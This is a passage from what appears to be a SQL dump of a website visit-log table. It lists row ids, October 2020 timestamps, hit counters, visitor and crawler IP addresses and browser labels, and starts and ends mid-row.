94.144.91','chrome'),(539389,1601555425,1,1,0,0,'5.58.131.197','chrome'),(539390,1601557271,1,1,0,0,'31.13.103.8','other'),(539391,1601557825,1,1,0,0,'69.171.251.28','other'),(539392,1601557858,1,1,0,0,'31.13.127.20','other'),(539393,1601559420,1,1,0,0,'173.252.95.9','other'),(539394,1601559425,1,1,0,0,'31.13.127.117','other'),(539395,1601561716,1,1,0,0,'31.13.127.7','other'),(539396,1601561717,1,1,0,0,'173.252.95.9','other'),(539397,1601562323,2,2,0,0,'37.55.238.143','chrome'),(539398,1601563236,1,1,0,0,'37.55.238.143','chrome'),(539399,1601563415,1,1,0,0,'173.252.95.118','other'),(539400,1601563748,1,1,0,0,'69.171.251.1','other'),(539401,1601563826,1,1,0,0,'31.41.107.31','chrome'),(539402,1601563940,1,1,0,0,'31.13.127.18','other'),(539403,1601564406,1,1,0,0,'37.55.238.143','chrome'),(539404,1601566367,1,1,0,0,'173.252.95.117','other'),(539405,1601566430,1,1,0,0,'31.13.127.120','other'),(539406,1601566578,1,1,0,0,'178.133.141.97','chrome'),(539407,1601568756,1,1,0,0,'173.252.95.25','other'),(539408,1601570090,1,1,0,0,'173.252.107.111','other'),(539409,1601571427,1,1,0,0,'69.171.251.17','other'),(539410,1601571510,1,1,0,0,'31.13.127.22','other'),(539411,1601573654,1,1,0,0,'31.13.127.117','other'),(539412,1601574650,1,1,0,0,'37.55.238.143','chrome'),(539413,1601576268,1,1,0,0,'188.163.120.103','other'),(539414,1601576779,1,1,0,0,'46.211.34.180','chrome'),(539415,1601577112,1,1,0,0,'69.171.251.30','other'),(539416,1601577291,1,1,0,0,'31.13.127.17','other'),(539417,1601577607,1,1,0,0,'66.220.149.15','other'),(539418,1601580564,1,1,0,0,'193.23.140.2','other'),(539419,1601581692,1,1,0,0,'77.121.125.85','chrome'),(539420,1601584059,1,1,0,0,'91.231.43.112','chrome'),(539421,1601584084,1,1,0,0,'66.220.149.8','other'),(539422,1601590036,1,1,0,0,'173.252.95.34','other'),(539423,1601594480,1,0,1,0,'66.249.66.92',''),(539424,1601621329,1,1,0,0,'46.211.82.167','chrome'),(539425,1601625266,1,1,0,0,'31.13.127.12','other'),(539426,1601627286,1,1,0,0,'31.13.127.13','other'),(539427,1601630872,1,1,0,0,'173.252.87.13','other'),(539428,1601632167,1,1,0,0,'69.171.251.13','other'),(539429,1601632291,1,1,0,0,'31.13.127.113','other'),(539430,1601635300,1,1,0,0,'193.19.254.1','chrome'),(539431,1601635359,1,1,0,0,'31.13.127.111','other'),(539433,1601635406,1,1,0,0,'46.211.8.35','chrome'),(539434,1601635421,1,1,0,0,'173.252.127.28','other'),(539435,1601635999,1,1,0,0,'178.94.144.91','chrome'),(539436,1601638896,1,1,0,0,'69.171.251.20','other'),(539437,1601638909,1,1,0,0,'31.13.127.10','other'),(539438,1601639250,1,1,0,0,'173.252.95.22','other'),(539439,1601640403,1,1,0,0,'173.252.95.25','other'),(539440,1601640449,1,1,0,0,'173.252.127.17','other'),(539441,1601640450,1,1,0,0,'173.252.95.119','other'),(539443,1601640451,1,1,0,0,'66.220.149.9','other'),(539444,1601642655,1,1,0,0,'69.171.251.1','other'),(539446,1601642897,1,1,0,0,'173.252.95.30','other'),(539447,1601643159,1,1,0,0,'31.43.249.34','chrome'),(539448,1601643338,1,1,0,0,'46.211.50.207','chrome'),(539449,1601647251,1,1,0,0,'66.220.149.14','other'),(539450,1601650961,1,1,0,0,'79.170.249.224','chrome'),(539451,1601653718,1,1,0,0,'91.196.178.25','chrome'),(539452,1601656836,1,1,0,0,'31.13.127.6','other'),(539453,1601656846,1,1,0,0,'69.171.251.112','other'),(539454,1601658182,1,1,0,0,'173.252.127.116','other'),(539455,1601660263,1,1,0,0,'31.13.127.8','other'),(539456,1601665357,1,1,0,0,'66.220.149.113','other'),(539457,1601665359,1,1,0,0,'69.171.251.111','other'),(539458,1601666247,1,1,0,0,'69.171.251.14','other'),(539459,1601666265,1,1,0,0,'31.13.127.9','other'),(539460,1601666775,1,1,0,0,'173.252.95.116','other'),(539461,1601667337,1,1,0,0,'173.252.111.9','other'),(539463,1601667342,1,1,0,0,'31.13.127.6','other'),(539464,1601668716,1,1,0,0,'69.171.251.113','other'),(539466,1601671329,1,1,0,0,'91.196.178.161','other'),(539467,1601679992,1,0,1,0,'66.249.66.91',''),(539468,1601683953,1,1,0,0,'173.252.95.9','other'),(539469,1601714153,1,1,0,0,'173.252.95.11','other'),(539470,1601715697,1,1,0,0,'69.171.251.6','other'),(539471,1601715706,1,1,0,0,'66.220.149.24','other'),(539472,1601721726,1,1,0,0,'173.252.95.23','other'),(539473,1601724361,1,1,0,0,'69.171.251.5','other'),(539474,1601724453,1,1,0,0,'31.13.127.116','other'),(539475,1601729861,1,1,0,0,'37.73.194.96','chrome'),(539476,1601730292,1,1,0,0,'209.17.96.82','other'),(539477,1601730357,1,1,0,0,'91.196.178.25','chrome'),(539478,1601730404,1,1,0,0,'173.252.95.17','other'),(539479,1601734382,1,1,0,0,'173.252.95.8','other'),(539480,1601734759,1,1,0,0,'69.171.251.21','other'),(539481,1601734791,1,1,0,0,'66.220.149.14','other'),(539482,1601741726,1,1,0,0,'31.13.127.24','other'),(539483,1601741738,1,1,0,0,'69.171.251.5','other'),(539484,1601742920,1,1,0,0,'31.13.127.19','other'),(539485,1601742921,1,1,0,0,'31.13.127.5','other'),(539486,1601744545,1,1,0,0,'128.124.49.47','chrome'),(539487,1601745092,1,1,0,0,'146.120.168.102','chrome'),(539488,1601745874,1,1,0,0,'194.44.45.188','chrome'),(539489,1601746083,1,1,0,0,'173.252.95.6','other'),(539490,1601747213,1,1,0,0,'93.170.117.25','other'),(539491,1601766396,1,0,1,0,'66.249.66.93',''),(539492,1601799325,1,1,0,0,'173.252.95.8','other'),(539493,1601799335,1,1,0,0,'31.13.127.13','other'),(539494,1601802616,1,1,0,0,'69.171.251.12','other'),(539495,1601832511,1,1,0,0,'69.171.251.8','other'),(539496,1601834282,1,1,0,0,'88.155.189.164','chrome'),(539497,1601837281,1,1,0,0,'91.196.178.25','chrome'),(539498,1601837335,1,1,0,0,'173.252.111.12','other'),(539500,1601837336,1,1,0,0,'173.252.111.23','other'),(539502,1601837340,1,1,0,0,'173.252.111.16','other'),(539503,1601837342,1,1,0,0,'173.252.111.112','other'),(539505,1601837412,1,1,0,0,'173.252.87.12','other'),(539506,1601837756,1,1,0,0,'31.13.127.10','other'),(539507,1601837828,1,1,0,0,'46.63.121.200','chrome'),(539508,1601837851,1,1,0,0,'5.173.16.208','chrome'),(539509,1601837908,1,1,0,0,'173.252.95.29','other'),(539511,1601837988,1,1,0,0,'188.146.99.173','chrome'),(539512,1601838110,1,1,0,0,'173.252.107.117','other'),(539513,1601838309,2,2,0,0,'46.211.3.229','chrome'),(539514,1601838468,1,1,0,0,'46.211.54.176','chrome'),(539515,1601838814,1,1,0,0,'188.239.27.247','chrome'),(539516,1601838963,1,1,0,0,'5.58.155.28','chrome'),(539517,1601841512,1,1,0,0,'193.19.254.1','chrome'),(539518,1601841816,1,1,0,0,'46.211.15.136','chrome'),(539519,1601846264,1,1,0,0,'178.133.12.118','chrome'),(539520,1601848632,1,1,0,0,'185.231.207.70','chrome'),(539521,1601851917,1,0,1,0,'66.249.66.91',''),(539522,1601851924,1,0,1,0,'66.249.66.92',''),(539523,1601861489,1,1,0,0,'5.59.71.248','chrome'),(539524,1601861993,1,1,0,0,'31.13.115.12','other'),(539525,1601861994,1,1,0,0,'31.13.115.21','other'),(539526,1601862268,1,1,0,0,'66.220.149.8','other'),(539527,1601869019,1,1,0,0,'91.196.178.25','chrome'),(539528,1601869687,1,1,0,0,'37.73.160.137','chrome'),(539529,1601875697,1,1,0,0,'46.211.36.144','chrome'),(539530,1601879028,1,1,0,0,'173.252.111.20','other'),(539531,1601880926,1,1,0,0,'94.153.76.232','chrome'),(539532,1601881324,1,1,0,0,'31.13.127.112','other'),(539533,1601881325,1,1,0,0,'31.13.127.23','other'),(539534,1601882937,1,1,0,0,'31.13.127.3','other'),(539535,1601884072,1,1,0,0,'94.153.76.232','chrome'),(539536,1601885138,1,1,0,0,'94.153.76.232','chrome'),(539537,1601885787,1,1,0,0,'34.254.44.235','other'),(539538,1601886758,1,1,0,0,'173.252.127.24','other'),(539539,1601887386,1,1,0,0,'194.44.17.114','chrome'),(539540,1601891330,1,1,0,0,'173.252.95.19','other'),(539541,1601891627,1,1,0,0,'173.252.95.23','other'),(539542,1601891971,1,1,0,0,'80.235.63.97','chrome'),(539543,1601899868,1,1,0,0,'66.220.149.37','other'),(539544,1601905195,1,1,0,0,'46.211.39.117','chrome'),(539545,1601908631,1,1,0,0,'66.220.149.16','other'),(539546,1601911717,1,1,0,0,'173.252.95.22','other'),(539547,1601917698,1,1,0,0,'91.196.178.25','chrome'),(539548,1601919317,1,1,0,0,'46.211.54.151','chrome'),(539549,1601921405,1,1,0,0,'173.252.87.8','other'),(539550,1601928284,1,1,0,0,'69.171.251.26','other'),(539551,1601938319,1,0,1,0,'66.249.66.77',''),(539552,1601946292,4,4,0,0,'44.235.91.92','chrome'),(539553,1601959274,1,1,0,0,'173.252.111.16','other'),(539554,1601962977,1,1,0,0,'31.13.127.119','other'),(539555,1601973136,1,1,0,0,'31.13.127.18','other'),(539556,1601973137,1,1,0,0,'31.13.127.112','other'),(539557,1601980417,1,1,0,0,'173.252.107.17','other'),(539558,1601985227,1,1,0,0,'128.124.32.7','chrome'),(539559,1601986913,1,1,0,0,'91.196.178.25','chrome'),(539560,1601987481,1,1,0,0,'31.13.127.7','other'),(539561,1601997611,8,8,0,0,'94.153.134.142','chrome'),(539562,1601999839,2,2,0,0,'94.153.134.142','chrome'),(539563,1602006074,1,1,0,0,'185.138.231.194','chrome'),(539564,1602011588,1,1,0,0,'173.252.83.1','other'),(539566,1602011589,1,1,0,0,'173.252.83.111','other'),(539567,1602011590,1,1,0,0,'66.220.149.8','other'),(539568,1602015259,1,1,0,0,'199.244.88.132','chrome'),(539569,1602023834,1,0,1,0,'66.249.66.92',''),(539570,1602062523,1,1,0,0,'31.41.107.58','chrome'),(539571,1602073566,1,1,0,0,'37.73.195.222','chrome'),(539572,1602079083,2,2,0,0,'31.13.127.17','other'),(539573,1602083371,1,1,0,0,'173.252.95.27','other'),(539577,1602083374,1,1,0,0,'93.170.118.26','chrome'),(539578,1602084859,1,1,0,0,'173.252.127.34','other'),(539579,1602086337,1,1,0,0,'31.13.127.4','other'),(539580,1602091888,1,1,0,0,'68.183.61.26','other'),(539581,1602092858,1,1,0,0,'194.44.57.6','chrome'),(539582,1602094761,1,1,0,0,'185.177.191.38','chrome'),(539583,1602097492,1,1,0,0,'138.197.102.148','other'),(539584,1602100267,1,1,0,0,'173.252.111.16','other'),(539585,1602100754,1,1,0,0,'209.17.97.26','other'),(539586,1602110233,1,0,1,0,'66.249.66.93',''),(539587,1602130491,1,1,0,0,'173.252.95.5','other'),(539588,1602135870,1,1,0,0,'37.248.155.52','chrome'),(539589,1602139249,2,2,0,0,'91.196.178.25','chrome'),(539590,1602141575,1,1,0,0,'88.155.30.33','chrome'),(539591,1602145387,1,1,0,0,'31.13.127.3','other'),(539592,1602152373,1,1,0,0,'37.221.141.153','chrome'),(539593,1602152495,1,1,0,0,'66.220.149.26','other'),(539595,1602152496,1,1,0,0,'173.252.79.12','other'),(539597,1602155988,1,1,0,0,'173.252.95.28','other'),(539598,1602155994,1,1,0,0,'94.153.23.116','chrome'),(539599,1602156239,1,1,0,0,'173.252.127.7','other'),(539600,1602164586,1,1,0,0,'176.121.5.147','chrome'),(539601,1602174462,1,1,0,0,'91.196.178.25','chrome'),(539602,1602174842,1,1,0,0,'193.239.235.112','other'),(539603,1602179205,1,1,0,0,'195.114.121.242','chrome'),(539604,1602181951,1,1,0,0,'194.44.185.104','chrome'),(539605,1602183188,1,1,0,0,'46.173.168.44','chrome'),(539606,1602188021,1,1,0,0,'173.252.111.7','other'),(539607,1602188096,1,1,0,0,'91.196.121.149','chrome'),(539608,1602188097,1,1,0,0,'173.252.111.118','other'),(539609,1602188208,1,1,0,0,'173.252.111.23','other'),(539610,1602196645,1,0,1,0,'66.249.70.47',''),(539611,1602270222,1,1,0,0,'109.227.104.155','chrome'),(539612,1602274372,1,1,0,0,'46.211.22.121','chrome'),(539613,1602279165,1,1,0,0,'194.44.57.156','chrome'),(539614,1602282159,1,0,1,0,'66.249.69.238',''),(539615,1602307471,1,1,0,0,'128.124.253.56','chrome'),(539616,1602319673,1,1,0,0,'91.196.178.25','chrome'),(539617,1602320990,1,1,0,0,'91.196.178.25','chrome'),(539618,1602321118,1,1,0,0,'31.13.127.120','other'),(539619,1602321119,1,1,0,0,'31.13.127.6','other'),(539622,1602321124,1,1,0,0,'31.13.127.4','other'),(539623,1602321129,1,1,0,0,'31.13.127.13','other'),(539624,1602321130,1,1,0,0,'31.13.127.24','other'),(539625,1602321931,1,1,0,0,'185.177.191.17','chrome'),(539626,1602322001,2,2,0,0,'91.196.178.25','chrome'),(539627,1602322021,1,1,0,0,'94.153.64.79','chrome'),(539628,1602322205,1,1,0,0,'31.13.127.22','other'),(539629,1602322206,1,1,0,0,'31.13.127.117','other'),(539631,1602322207,1,1,0,0,'31.13.127.19','other'),(539632,1602322214,1,1,0,0,'31.13.127.20','other'),(539633,1602322217,1,1,0,0,'31.13.127.118','other'),(539634,1602322312,1,1,0,0,'173.252.87.23','other'),(539635,1602322483,1,1,0,0,'46.211.76.199','other'),(539636,1602322579,1,1,0,0,'46.211.78.154','chrome'),(539637,1602322833,1,1,0,0,'91.196.178.122','chrome'),(539638,1602322848,1,1,0,0,'173.252.95.19','other'),(539639,1602322963,1,1,0,0,'91.196.178.25','chrome'),(539640,1602323050,1,1,0,0,'69.171.251.21','other'),(539641,1602323051,1,1,0,0,'69.171.251.10','other'),(539642,1602323282,1,1,0,0,'130.180.219.138','chrome'),(539643,1602323301,1,1,0,0,'173.252.95.20','other'),(539644,1602323390,1,1,0,0,'91.196.178.157','chrome'),(539645,1602323435,1,1,0,0,'93.73.113.14','chrome'),(539646,1602323563,1,1,0,0,'91.196.178.119','chrome'),(539647,1602323604,1,1,0,0,'178.133.140.37','chrome'),(539648,1602323683,1,1,0,0,'46.133.129.24','chrome'),(539649,1602323917,1,1,0,0,'91.196.178.25','chrome'),(539650,1602323948,1,1,0,0,'82.145.210.80','other'),(539651,1602324153,1,1,0,0,'46.133.233.212','other'),(539652,1602324214,1,1,0,0,'194.44.115.131','chrome'),(539653,1602324249,1,1,0,0,'130.180.210.137','chrome'),(539654,1602324266,1,1,0,0,'94.153.31.116','chrome'),(539655,1602324313,1,1,0,0,'31.13.127.4','other'),(539656,1602324314,1,1,0,0,'31.13.127.119','other'),(539657,1602324394,1,1,0,0,'91.196.177.21','chrome'),(539658,1602324414,1,1,0,0,'91.196.178.172','chrome'),(539659,1602324419,1,1,0,0,'94.153.30.135','other'),(539660,1602324556,2,2,0,0,'91.196.178.57','chrome'),(539661,1602324681,1,1,0,0,'178.92.249.185','chrome'),(539662,1602324742,1,1,0,0,'94.153.14.107','chrome'),(539663,1602324839,2,2,0,0,'91.196.178.25','chrome'),(539664,1602324932,1,1,0,0,'176.105.196.113','chrome'),(539665,1602324999,1,1,0,0,'88.155.100.28','chrome'),(539666,1602325069,1,1,0,0,'91.196.178.116','chrome'),(539667,1602325194,1,1,0,0,'91.196.178.60','chrome'),(539668,1602325415,1,1,0,0,'185.244.142.142','chrome'),(539669,1602325424,1,1,0,0,'185.30.202.82','chrome'),(539670,1602325441,1,1,0,0,'173.252.107.26','other'),(539671,1602325784,1,1,0,0,'128.124.41.25','chrome'),(539672,1602325822,1,1,0,0,'91.196.178.25','chrome'),(539673,1602325891,1,1,0,0,'91.196.178.33','chrome'),(539674,1602325915,1,1,0,0,'178.94.172.62','chrome'),(539675,1602326001,1,1,0,0,'66.220.149.15','other'),(539676,1602326174,1,1,0,0,'94.153.72.139','chrome'),(539677,1602326278,1,1,0,0,'46.133.156.95','chrome'),(539678,1602326347,1,1,0,0,'46.211.24.251','chrome'),(539679,1602326371,1,1,0,0,'91.196.178.60','other'),(539680,1602326428,1,1,0,0,'37.53.229.157','chrome'),(539681,1602326492,1,1,0,0,'92.113.127.239','chrome'),(539682,1602326763,1,1,0,0,'128.124.53.184','chrome'),(539683,1602326853,1,1,0,0,'88.155.64.51','chrome'),(539684,1602326872,1,1,0,0,'46.201.113.156','chrome'),(539685,1602326927,1,1,0,0,'128.124.68.128','chrome'),(539686,1602327016,1,1,0,0,'37.55.227.217','chrome'),(539687,1602327153,1,1,0,0,'185.138.228.238','chrome'),(539688,1602327244,1,1,0,0,'91.196.178.189','chrome'),(539689,1602327299,1,1,0,0,'91.196.178.25','chrome'),(539690,1602327539,1,1,0,0,'193.106.130.239','chrome'),(539691,1602327608,1,1,0,0,'94.153.21.107','chrome'),(539692,1602327703,1,1,0,0,'91.196.178.39','chrome'),(539693,1602328071,1,1,0,0,'195.10.210.210','chrome'),(539694,1602328115,1,1,0,0,'91.196.177.72','chrome'),(539695,1602328259,1,1,0,0,'91.196.178.26','chrome'),(539696,1602328413,1,1,0,0,'91.196.178.178','chrome'),(539697,1602328425,1,1,0,0,'173.252.111.9','other'),(539698,1602328435,1,1,0,0,'46.211.45.196','chrome'),(539699,1602328535,1,1,0,0,'93.171.79.114','other'),(539700,1602328610,1,1,0,0,'31.13.127.3','other'),(539701,1602328665,1,1,0,0,'91.196.178.38','chrome'),(539702,1602328875,1,1,0,0,'128.124.128.26','chrome'),(539703,1602328998,1,1,0,0,'185.177.191.38','chrome'),(539704,1602329051,1,1,0,0,'46.211.78.154','chrome'),(539705,1602329052,1,1,0,0,'91.196.178.109','chrome'),(539706,1602329152,1,1,0,0,'31.13.127.15','other'),(539707,1602329447,1,1,0,0,'46.211.41.1','other'),(539708,1602329777,1,1,0,0,'178.151.18.130','chrome'),(539709,1602330036,1,1,0,0,'46.135.103.171','chrome'),(539710,1602330054,1,1,0,0,'46.211.78.154','chrome'),(539711,1602330258,1,1,0,0,'130.180.218.4','chrome'),(539712,1602330274,1,1,0,0,'37.73.214.17','chrome'),(539713,1602330285,1,1,0,0,'46.211.78.230','other'),(539714,1602330400,1,1,0,0,'95.132.35.57','other'),(539715,1602330518,1,1,0,0,'91.196.178.181','chrome'),(539716,1602330650,1,1,0,0,'31.13.127.22','other'),(539717,1602330900,1,1,0,0,'94.45.140.219','chrome'),(539718,1602330916,1,1,0,0,'94.153.27.177','chrome'),(539719,1602331496,1,1,0,0,'173.252.83.113','other'),(539720,1602331692,1,1,0,0,'128.124.225.114','chrome'),(539721,1602332458,1,1,0,0,'84.54.87.88','chrome'),(539722,1602332489,1,1,0,0,'46.211.28.11','chrome'),(539723,1602332629,1,1,0,0,'37.73.195.135','chrome'),(539724,1602332974,1,1,0,0,'94.153.31.111','chrome'),(539725,1602333972,1,1,0,0,'91.196.177.158','chrome'),(539726,1602335002,1,1,0,0,'46.211.17.80','chrome'),(539727,1602335533,1,1,0,0,'94.153.75.113','other'),(539728,1602335594,1,1,0,0,'178.133.61.227','chrome'),(539729,1602335686,1,1,0,0,'46.133.233.212','other'),(539730,1602335742,1,1,0,0,'173.252.107.19','other'),(539731,1602336276,1,1,0,0,'185.217.232.6','chrome'),(539732,1602336286,1,1,0,0,'91.196.178.18','chrome'),(539733,1602336589,1,1,0,0,'91.196.178.58','chrome'),(539734,1602336607,1,1,0,0,'173.252.107.30','other'),(539735,1602337292,1,1,0,0,'94.153.71.110','other'),(539736,1602337704,1,1,0,0,'91.196.178.51','chrome'),(539737,1602338291,1,1,0,0,'173.252.95.118','other'),(539738,1602338300,3,3,0,0,'91.196.178.68','other'),(539739,1602339096,1,1,0,0,'46.133.156.95','chrome'),(539740,1602339623,1,1,0,0,'128.124.157.55','chrome'),(539741,1602339881,1,1,0,0,'173.252.111.112','other'),(539742,1602341065,2,2,0,0,'31.13.127.111','other'),(539743,1602341422,2,2,0,0,'31.13.127.4','other'),(539744,1602341920,1,1,0,0,'31.13.127.19','other'),(539745,1602341926,1,1,0,0,'31.13.127.17','other'),(539746,1602342625,1,1,0,0,'178.95.157.156','chrome'),(539747,1602342661,1,1,0,0,'31.13.127.6','other'),(539748,1602342662,1,1,0,0,'31.13.127.24','other'),(539749,1602342677,1,1,0,0,'92.113.126.167','chrome'),(539750,1602342724,1,1,0,0,'37.73.64.231','chrome'),(539751,1602343245,1,1,0,0,'91.196.178.60','chrome'),(539752,1602343703,1,1,0,0,'91.196.178.2','chrome'),(539753,1602343896,2,2,0,0,'31.13.127.113','other'),(539755,1602344446,1,1,0,0,'31.13.127.18','other'),(539756,1602344550,1,1,0,0,'91.196.178.175','chrome'),(539757,1602344949,1,1,0,0,'31.13.127.120','other'),(539758,1602344950,1,1,0,0,'31.13.127.118','other'),(539759,1602344966,1,1,0,0,'31.202.50.12','chrome'),(539760,1602344968,1,1,0,0,'94.153.25.114','chrome'),(539761,1602345107,1,1,0,0,'94.153.3.151','chrome'),(539762,1602345445,1,1,0,0,'31.13.127.19','other'),(539763,1602345446,1,1,0,0,'31.13.127.20','other'),(539764,1602345885,1,1,0,0,'31.13.127.11','other'),(539765,1602345886,1,1,0,0,'31.13.127.14','other'),(539766,1602346115,1,1,0,0,'46.133.124.155','chrome'),(539767,1602346980,1,1,0,0,'185.16.118.102','chrome'),(539768,1602347126,1,1,0,0,'91.196.178.20','chrome'),(539769,1602347323,1,1,0,0,'69.171.251.31','other'),(539770,1602347325,1,1,0,0,'173.252.83.6','other'),(539772,1602347425,1,1,0,0,'66.220.149.1','other'),(539773,1602347570,1,1,0,0,'173.252.95.9','other'),(539774,1602347722,1,1,0,0,'91.196.178.85','chrome'),(539775,1602347745,1,1,0,0,'37.55.59.88','chrome'),(539776,1602348020,1,1,0,0,'92.113.190.122','chrome'),(539777,1602348116,1,1,0,0,'185.237.217.5','chrome'),(539778,1602348209,1,1,0,0,'173.252.107.6','other'),(539779,1602348290,1,1,0,0,'31.13.127.119','other'),(539781,1602348415,1,1,0,0,'31.13.127.20','other'),(539782,1602348633,1,1,0,0,'31.13.127.7','other'),(539783,1602348634,1,1,0,0,'31.13.127.113','other'),(539784,1602348661,1,1,0,0,'128.124.225.114','chrome'),(539785,1602349012,1,1,0,0,'94.153.80.109','chrome'),(539786,1602349439,1,1,0,0,'91.196.178.41','chrome'),(539787,1602349584,1,1,0,0,'91.196.178.152','chrome'),(539788,1602349721,1,1,0,0,'94.153.48.126','chrome'),(539789,1602350435,1,1,0,0,'46.211.81.180','chrome'),(539790,1602350437,1,1,0,0,'31.13.127.118','other'),(539792,1602350972,1,1,0,0,'91.196.178.58','chrome'),(539793,1602350989,1,1,0,0,'69.171.251.120','other'),(539794,1602351104,1,1,0,0,'31.13.127.15','other'),(539795,1602351105,1,1,0,0,'31.13.127.116','other'),(539796,1602351740,1,1,0,0,'31.13.127.22','other'),(539797,1602351742,1,1,0,0,'31.13.127.111','other'),(539798,1602352004,1,1,0,0,'88.155.101.68','chrome'),(539799,1602352077,1,1,0,0,'91.225.201.134','chrome'),(539800,1602352338,1,1,0,0,'185.30.202.115','chrome'),(539801,1602352573,1,1,0,0,'194.44.145.90','chrome'),(539802,1602352806,1,1,0,0,'185.208.229.216','chrome'),(539803,1602352933,1,1,0,0,'193.107.168.43','chrome'),(539804,1602353102,1,1,0,0,'91.196.178.153','chrome'),(539805,1602353200,1,1,0,0,'69.171.251.13','other'),(539806,1602353306,1,1,0,0,'91.196.178.125','chrome'),(539807,1602353325,1,1,0,0,'91.210.251.64','chrome'),(539808,1602353345,1,1,0,0,'46.211.16.0','chrome'),(539809,1602353391,1,1,0,0,'91.196.178.91','chrome'),(539810,1602353431,2,2,0,0,'31.13.127.20','other'),(539811,1602354050,1,1,0,0,'91.196.178.12','chrome'),(539812,1602354318,1,1,0,0,'91.237.241.214','chrome'),(539813,1602354367,1,1,0,0,'93.77.242.181','chrome'),(539814,1602354479,1,1,0,0,'46.211.45.198','chrome'),(539815,1602354550,1,1,0,0,'193.33.38.56','chrome'),(539816,1602354916,1,1,0,0,'72.137.84.61','chrome'),(539817,1602354993,1,1,0,0,'176.37.116.66','chrome'),(539818,1602355368,1,1,0,0,'91.196.178.180','chrome'),(539819,1602355387,1,1,0,0,'178.92.85.162','chrome'),(539820,1602355440,1,1,0,0,'31.13.127.6','other'),(539821,1602355441,1,1,0,0,'31.13.127.117','other'),(539822,1602355615,1,1,0,0,'91.196.121.134','chrome'),(539823,1602356267,1,1,0,0,'91.196.178.166','chrome'),(539824,1602356368,1,1,0,0,'173.252.95.120','other'),(539825,1602356369,1,1,0,0,'173.252.87.111','other'),(539826,1602356683,1,1,0,0,'46.211.13.169','chrome'),(539827,1602357147,1,1,0,0,'91.196.178.148','chrome'),(539828,1602357475,2,2,0,0,'91.196.178.25','chrome'),(539829,1602359637,1,1,0,0,'91.196.178.39','chrome'),(539830,1602359705,1,1,0,0,'91.241.123.19','chrome'),(539831,1602359904,1,1,0,0,'128.124.165.134','chrome'),(539832,1602360973,1,1,0,0,'46.211.44.146','chrome'),(539833,1602361035,1,1,0,0,'173.252.83.8','other'),(539834,1602361037,1,1,0,0,'173.252.83.1','other'),(539835,1602361169,1,1,0,0,'91.196.178.152','chrome'),(539836,1602361248,1,1,0,0,'88.155.185.223','chrome'),(539837,1602361395,1,1,0,0,'178.133.21.17','chrome'),(539838,1602361896,1,1,0,0,'46.211.34.92','chrome'),(539839,1602362292,1,1,0,0,'5.58.70.98','chrome'),(539840,1602364322,1,1,0,0,'91.196.178.25','chrome'),(539841,1602365000,1,1,0,0,'88.155.98.5','chrome'),(539842,1602365084,1,1,0,0,'178.133.153.53','chrome'),(539843,1602365405,1,1,0,0,'176.121.6.42','chrome'),(539844,1602365515,1,1,0,0,'173.252.111.4','other'),(539845,1602366843,1,1,0,0,'94.153.0.57','chrome'),(539846,1602367624,1,1,0,0,'91.196.178.143','chrome'),(539847,1602367669,1,0,1,0,'66.249.66.92',''),(539848,1602369658,2,2,0,0,'31.13.127.117','other'),(539849,1602372392,1,1,0,0,'31.13.127.119','other'),(539850,1602372393,1,1,0,0,'31.13.127.111','other'),(539851,1602375076,1,1,0,0,'31.13.127.111','other'),(539852,1602375077,1,1,0,0,'31.13.127.116','other'),(539853,1602380445,1,1,0,0,'31.13.127.23','other'),(539854,1602380446,1,1,0,0,'31.13.127.24','other'),(539855,1602384851,1,1,0,0,'173.252.127.20','other'),(539856,1602384853,1,1,0,0,'66.220.149.9','other'),(539857,1602385360,1,1,0,0,'173.252.127.22','other'),(539858,1602386268,1,1,0,0,'94.153.14.84','other'),(539859,1602388488,1,1,0,0,'69.171.251.118','other'),(539860,1602389354,1,1,0,0,'69.171.251.2','other'),(539861,1602389736,1,1,0,0,'66.220.149.6','other'),(539862,1602392140,1,1,0,0,'66.220.149.8','other'),(539863,1602392532,1,1,0,0,'185.53.79.253','chrome'),(539864,1602394202,1,1,0,0,'194.187.152.122','chrome'),(539865,1602395562,1,1,0,0,'91.196.178.25','chrome'),(539866,1602395902,1,1,0,0,'91.196.178.61','chrome'),(539867,1602396627,1,1,0,0,'173.252.87.3','other'),(539868,1602396738,1,1,0,0,'34.233.95.169','other'),(539869,1602398146,1,1,0,0,'173.252.127.10','other'),(539870,1602398147,1,1,0,0,'173.252.127.23','other'),(539871,1602398807,1,1,0,0,'5.58.62.42','chrome'),(539872,1602399289,1,1,0,0,'91.196.178.168','other'),(539873,1602399486,2,2,0,0,'91.196.178.25','chrome'),(539874,1602399615,1,1,0,0,'31.13.127.13','other'),(539875,1602399616,1,1,0,0,'31.13.127.1','other'),(539877,1602399641,1,1,0,0,'31.13.127.7','other'),(539878,1602399706,1,1,0,0,'173.252.87.24','other'),(539879,1602400068,1,1,0,0,'31.13.127.117','other'),(539880,1602400069,1,1,0,0,'31.13.127.120','other'),(539881,1602400546,2,2,0,0,'91.196.178.25','chrome'),(539882,1602400715,1,1,0,0,'69.171.251.23','other'),(539883,1602401515,1,1,0,0,'109.207.120.78','chrome'),(539884,1602401778,1,1,0,0,'93.73.113.14','chrome'),(539885,1602401798,1,1,0,0,'31.13.127.1','other'),(539886,1602402519,1,1,0,0,'192.38.128.6','chrome'),(539887,1602402578,1,1,0,0,'91.196.178.25','chrome'),(539888,1602403273,1,1,0,0,'31.13.127.18','other'),(539889,1602403274,1,1,0,0,'31.13.127.13','other'),(539890,1602403794,1,1,0,0,'94.153.7.59','chrome'),(539891,1602405251,1,1,0,0,'185.237.217.0','chrome'),(539892,1602405347,1,1,0,0,'69.171.251.18','other'),(539893,1602405899,1,1,0,0,'31.13.127.118','other'),(539894,1602405900,1,1,0,0,'31.13.127.119','other'),(539895,1602407093,1,1,0,0,'31.13.127.15','other'),(539896,1602407094,1,1,0,0,'31.13.127.3','other'),(539897,1602407752,1,1,0,0,'91.196.178.137','chrome'),(539898,1602407998,1,1,0,0,'173.252.95.22','other'),(539899,1602408056,1,1,0,0,'173.252.127.25','other'),(539900,1602408175,1,1,0,0,'31.13.127.118','other'),(539902,1602410049,1,1,0,0,'91.196.178.149','chrome'),(539903,1602410159,1,1,0,0,'46.211.60.217','chrome'),(539904,1602410216,2,2,0,0,'91.196.178.25','chrome'),(539905,1602410308,1,1,0,0,'87.76.254.38','chrome'),(539906,1602410755,1,1,0,0,'31.13.127.10','other'),(539907,1602410756,1,1,0,0,'31.13.127.112','other'),(539908,1602410760,1,1,0,0,'31.13.127.22','other'),(539909,1602410763,2,2,0,0,'31.13.127.119','other'),(539910,1602410766,1,1,0,0,'173.252.95.119','other'),(539911,1602410767,2,2,0,0,'31.13.127.4','other'),(539912,1602410768,1,1,0,0,'31.13.127.1','other'),(539913,1602410801,1,1,0,0,'173.252.95.